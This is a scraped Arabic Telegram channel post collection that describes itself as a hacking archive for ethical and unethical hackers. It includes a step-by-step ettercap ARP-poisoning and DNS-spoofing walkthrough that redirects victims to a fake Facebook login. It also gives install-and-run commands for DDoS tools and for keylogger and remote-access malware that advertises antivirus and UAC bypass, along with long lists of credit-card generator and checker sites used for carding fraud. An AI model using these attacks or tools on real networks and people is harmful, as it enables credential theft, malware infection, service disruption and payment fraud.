The Hacking Library
353 subscribers
874 photos
19 videos
44 files
1.3K links
محتوي القناه هو عباره عن تجميع
القناه عباره عن ارشيف للهكرز الأخلاقيات وغير الأخلاقيين
استمتعوا😀👍
Download Telegram
Channel created
Channel name was changed to «المبرمج الخبيث»
نبدا الشروحات بعد ١٥٠
اليوم سوف أقوم بشرح عن أداة تحليل البروتوكولات وكيف يتم تحليلها واستغلالها
بدايةً سوف نتكلم عن البروتوكول وهو...
هو بروتوكول الاتصال الأساسي في حزمة بروتوكولات الإنترنت ويُشكّل الأساس الذي تعتمد عليه عمليّة توجيه الرزم (Routing) ضمن الشبكة، ويسمح ذلك بالاتصال بين الشبكات المُختلفة، وهذا هو جوهر شبكة الإنترنت.
اي أنهُ بإختصار مثل الوسيط بينك وبين الشبكة حتى تستطيع الحصول على ما تُريد وهُناك العديد من البروتوكولات ولكل بروتوكول مهمة خاصّة به....

لنبدأ الشرح...

#Tools :
+ Wireshark
+ Bettercap

#Steps :
1- سوف نقوم بتشغيل أداة تحليل البروتوكولات وهكذا سوف يكون تم إجتياز أول شئ من الشرح....
# لتشغيل الأداة يوجد طريقتين....
- كتابة wireshark داخل التيرمنال
- نذهب إلى
Application =>  => wireshark

# سوف تظهر لنا واجهة بها إختيار interface الخاص بنا يمكنك إختيار eth0 أو wlan0 حسب الذي تعمل به

# سوف تظهر لنا نافذة الأداة ومن هُنا نبدأ في تحليل البروتوكولات.....
لنتابع معاً....


2- بعد أن تظهر لنا نافذة الأداة سيظهر لنا العديد من الأشياء ولكن بالطبع لن نفهم شئ لذا لنفهم مع بعض كِل شئ...
سوف أترك صورة توّضح ما أتكلم عنه في الأسفل وسوف تجدوا أرقام وهي التي توّضح ما أتكلم عنه هُنا....

#1- ستجد كلمة مخفية مثل هذه....
Apply a display filter __ <Ctrl-/>
وهي تعني فلترة الأشياء التي تظهر لك وهي مثل موجه الأوامر الخاص بالأداة وسنفهم هذا لاحقاً....

#2- شريط المهام وبه كُلاً من....
No.         Time
وهي تعني برقم العملية وبجانبه الوقت وتظهر لك بالشكل التالي...
1 0.000000000
2 0.157298626

Source
وهي تعني بالمصدر الذي يأتي منهُ المعلومات والمقصود بها الأي بي الداخلي ويكون مثل هذا....
192.168.1.4

Destination
ستجد العديد من الأيبيات ولكن ستجد أيضاً الأي بي الذي قام بالإتصال عبرهُ...

Protocol
وهذه تعني البروتوكول المُستخدم وستجد العديد من البروتوكولات مثل....
DNS
UDP
TCP


info
وهذه تعني إتصل بماذا؟....
فمثلاً إذا كان البروتوكول الذي قُمنا باستغلاله هو DNS ستجد بعض الأشياء وبالنهاية إسم الموقع أو DNS الخاص بالشئ الذي إتصل به....


حسناً لنرى ما يُمكننا فعله....
سنقوم بفلترة الأشياء عبر الذي شرحته أول شئ الذي يُسمى filter...
سنقوم بوضع الشئ الذي نقوم بتحليل مثل البروتوكول وسوف نستخدم بروتوكول DNS ونقوم بتحليله لنرى كيف ذلك....

نكتب بالفراغ هذا فقط ثلاثة أحرف وهما...
# dns
وعندما يتصل أي أحد داخل الشبكة بأي شئ عبر هذا البروتوكول ستجد الأي بي الخاص به بالأهداف التي قام بزيارتها وكُل شئ وهكذا قد إنتهينا من تحليل البروتوكولات ويمكنك إضافة أي بروتوكول تُريده بدل dns ويمكنك إضافة أي بي مُعين أيضاً عبر كتابة الأمر التالي...
# ip.addr == الأي بي الذي تُريده
وإذا أردت تحليل بروتوكول مُعين نكتب التالي....
# ip.addr == الأي بي الذي تُريده && dns
أو يُمكنك إختيار البروتوكول الذي تُريده...


3- نأتي لكيفية الإستغلال وهُنا سوف نستخدم أداة ettercap....

# لتشغيل الأداة يوجد طريقتين أيضاً
ولكن سوف نستخدم الطريقة الأتية...
# Application => Sniff & Spoof => ettercap-gui

ولكن قبل هذا يجب علينا تعديل بعض الأشياء حتى تعمل معنا الأداة جيداً....

نكتب الأمر التالي داخل التيرمنال...
# gedit /etc/ettercap/etter.conf
ستجد كلمتي
ec_uid  ==> x
ec_gid  ==> x
وهذا الحرف يعني رقم عليك بتغييرها إلى رقم 0 هكذا....
ec_uid  ==> 0
ec_gid  ==> 0

وقُم بالبحث قليلاً عن كلمة root ستجد الأتي....

#---------------
#     Linux
#---------------
# ,,,,,,,, iptables

وستجد الكلمات التالية
#redir_command_on
#redir_command_off
قُم بحذف علامة الهاش هكذا....
redir_command_on
redir_command_off

نقوم بالتعديل على ملف dns حتى نقوم بعمل إعادة توجيه للرابط الذي نُريده...
سوف أُكمل وكأننا سوف نقوم بإستغلال dns
لإعادة التوجيه لرابط خبيث به تسجيل دخول إلى فيسبوك ولكي نفعل هذا سنقوم بعمل إضافة dns
الخاص بموقع فيسبوك داخل الملف وبجانبه سنضع أي بي الرابط الخاص بنا...

نكتب التالي بالتيرمنال...

# gedit /etc/ettercap/etter.dns
سنجد كلمة microsoft sucks
وبعدها روابط مثل...
microsoft.com
*.microsoft.com
www.microsoft.com
نقوم بتغيير microsoft
إلى الرابط الذي نُريد عمل تجسس عليه
وبجانبه سنجد أي بي سنقوم بتغييرها إلى أي بي أو هوست الرابط....


الأن سنبدأ الإستغلال...
# بعد تشغيل الأداة نختار

# Sniff
نختار
Unfied sniffing


# Hosts
نختار
scan for hosts

# Hosts
نختار منها Hosts list
ليظهر لنا الأهداف
وبعد أن نختار الهدف نقوم بتحديده
Add to Target 2
ونقوم بتحديد أي بي الراوتر
Add to Target 1

# Target
نختار
Current Targets

# Mitm
نختار
Arp Poisoning
ونختار
بعدها
✔️ Sniff remote connections.

# Plugins
ونختار
dns_spoof

# Sniff
نختار
Start Sniffing


وعندما يتم دخول الضحية إلى موقع فيسبوك سيجد صفحة تسجيل الدخول خاصّتك وهُنا ينتهي الشرح وهذا شئ بسيط بالنسبة لإستغلال مثل هذه البروتوكولات فيُمكنك فعل كُل شئ تُريده
وإن كان هُناك توفيق فمن الله وإذا كان خطأ فمني ومن الشيطان...


# هذا الشرح إهداء إلى كُل من ...

#CS_Princess
#VenomX_Team

# ومُقدم من....

#CS_Princess
#CrTVenom
صورة من داخل البرنامج موضحة...
السلام عليكم
موضوعنا هو.  الهجوم على شبكات الوايفاي
باداه قويه ومجربه


https://github.com/4L13199/LITEDDOS
cd LITEDDOS

لكي نشغلها
الامر.                                                                   
python2 LITEDDOS.py (ip router)80 (عدد الهجمات)


DARK MAN-----CH
1- اداه Umbrella
git clone https://github.com/4w4k3/Umbrella.git

cd Umbrella

sudo su

chmod +x install.sh

./install.sh

python umbrella.py

مميزات الاداه

Download executable on target system.
Silent execution.
Download and execute executable once time.
If the exe already had downloaded and running, open only pdf/docx/xxls/jpg/png.
Some Phishing methods are included.
Multiple Session disabled.
Bypass UAC.

#CS
2- اداه BeeLogger

اوامر تثبيتها

git clone https://github.com/4w4k3/BeeLogger.git

cd BeeLogger

sudo su

chmod +x install.sh

./install.sh

python bee.py

مميزات الاداه

Send logs each 120 seconds.
Send logs when chars > 50.
Send logs with GMAIL.
Some Phishing methods are included.
Multiple Session disabled.
Auto Persistence.

#CS
3- اداه Insanity-Framework

اوامر تثبيتها

git clone https://github.com/4w4k3/Insanity-Framework

cd Insanity-Framework

chmod +x install.sh

./install.sh

مميزات الاداه


Bypass most AV and Sandboxes.
Remote Control.
Payload Generation.
Some Phishing methods are included on payloads generated.
Detect Virtual Machines.
Multiple Session disabled.
Persistence and others features can be enabled.
Bypass UAC.
Memory Injection.

#CS
6- اداه ScanIp
وظيفتها عمل اسكان ل ip الموقع

اوامر تثبيتها

📍pkg install git
python2
📍
git clone https://github.com/Bl4ckDr460n/ScanIp
📍
cd ScanIp

📍python2 scanip.py

#CS
7- اداه Garuda-DDOS

عمل DDOS للموقع

📍pkg install git

📍pkg install python
📍
git clone https://github.com/Bl4ckDr460n/Garuda-DDOS
📍
cd Garuda-DDOS

📍python garuda.py -s ip - p 80 -t 135

#CS
8- اداه FaceCrack



pkg install python2 git -y

pip2 install requests mechanize

git clone https://github.com/Bl4ckDr460n/FaceCrack

cd FaceCrack

python2 facecrack.py


اترك لكم امر اكتشافها ..

#CS
9- اداه Dr460nYT

pkg update

pkg upgrade

pkg install python2 git -y

pip2 requests youtube-dl

git clone https://github.com/Bl4ckDr460n/Dr460nYT

cd Dr460nYT

python2 Dr460nYT.py

مميزات الاداه

هذه الأداة مفيدة لتحميل فيديوهات يوتيوب

#CS
مجموعه من المواقع المفيده

مواقع لتوليد CC

https://namso-gen.com/
https://www.elfqrin.com/discard_credit_card_generator.php
https://dzmohaipa.com/Bin/Dz/
https://xuls.to/gen/
https://databusterz.com/ccgen/
https://sieuthuthuat.com/bin
https://namso5.com/
http://geekhackerzccgen.tk
http://Primebox.ml
Anonymouspal.me
http://ccteam17.xyz/card/ccg/
bv1.tech
https://cc.namsopro.com
http://dark-h-zone.cf



CC فحص

http://geekhackerzccgen.tk/checker
https://sieuthuthuat.com/check
https://xuls.to/ccn/
http://ccteam17.xyz/card/ccn1/
http://vpnclub.ml/ccn1.html
http://madafaka.ru/
http://vpnclub.ml/ccn2.html
http://namsodebit.net/checker/
https://harchanpayments.es.tl/CHECKER-CC-tg-S.htm
http://www.checkerz.altervista.org/CCChecker/
http://checker.solutions/Login/
http://strawhatsec.altervista.org/cc/index.html


عمل البريد المؤقت

https://tempail.com
https://www.mohmal.com
https://temp-mail.org

نوت باد
https://ghostbin.com
https://hastebin.com
https://pastebin.com
https://hatebin.com


توليد البيانات الشخصية:

www.fakenamegenerator.com
www.datafakegenerator.com
https://randomuser.me
http://4devs.com.br



عدد هواتف افتراضيه
https://smsreceivefree.com
https://tempophone.com



1.- https://www.elfqrin.comv/discard_credit_card_generator.php

2.-http://mohadu31.com/bin/

3.-https://namso-gen.com

4.-http://namso.ezyro.com/?i=1

5.-http://archive.li/gvfdN

6.-https://ia1000.com

7.-http://sourcebinccgen.ml/CCGENSBC1/

8.-http://sourcebinccgen.ml/CCGENSBC2/

9.-https://obtain-link.com/checker2/Index.php

10.-http://namsocc.net

11.-https://ccgen.srijo.tech

12.-http://www.b7k-checker.club

13.-https://tnb-generator.000webhostapp.com

14.-http://profetaschek.xyz/gen/

15.-https://holk.xyz

16.-https://www.ondroid.ga

17.-https://cccardgen.es.tl

18.-http://x-secret.net/ccgen/

19.-http://ad365.me/

20.-https://www.ccgen.mx

21.-https://web.archive.org/web/20160726182003/https://cc.namsoelite.com/

22.-http://www.b7k-checker.club/

23.-http://hitlerccgen.com

24.-http://blckcardgen.xyz/~blckcard/

25.-https://cc.ajpro.ml/

26.-https://www.ccgen.mx/

27.-http://namsodebit.co/

28.-http://vpnclub.ml/cg/

29.-http://educapro.mx

30.-http://namsopirates.xyz

31.-http://www.bv1.tech

32.-https://namso.gdn/gen/

33. http://www.beshoycc.com

34.-http://safra.000webhostapp.com/cassa/

35.-https://bin.isecurity.pw

36.-http://virusteamdlg.com/gen/

37.-https://namso5.com/

38.-http://sourcebinccgen.ml/CCGENSBC3/

#CS
3- اداة trape

git clone https://github.com/jofpin/trape.git

cd trape

python2 -m pip install -r requirements.txt

عرض المميزات

python2 trape.py -h

وظيفتها اداة Trape
هي أداة تحليل وبحث OSIN ، والتي تتيح للناس تتبع وتنفيذ هجمات الهندسة الاجتماعية الذكية في الوقت الحقيقي. تم إنشاؤه بهدف تعليم العالم كيف يمكن لشركات الإنترنت الكبيرة الحصول على معلومات سرية مثل حالة جلسات مواقعها الإلكترونية أو خدماتها والتحكم في مستخدميها من خلال متصفحهم ، دون علمهم ، ولكنه يتطور بهدف مساعدة الحكومة المنظمات والشركات والباحثين لتتبع مجرمي الإنترنت.

طريقه عملها

python2 trape.py --url http://example.com --port 8080

#CS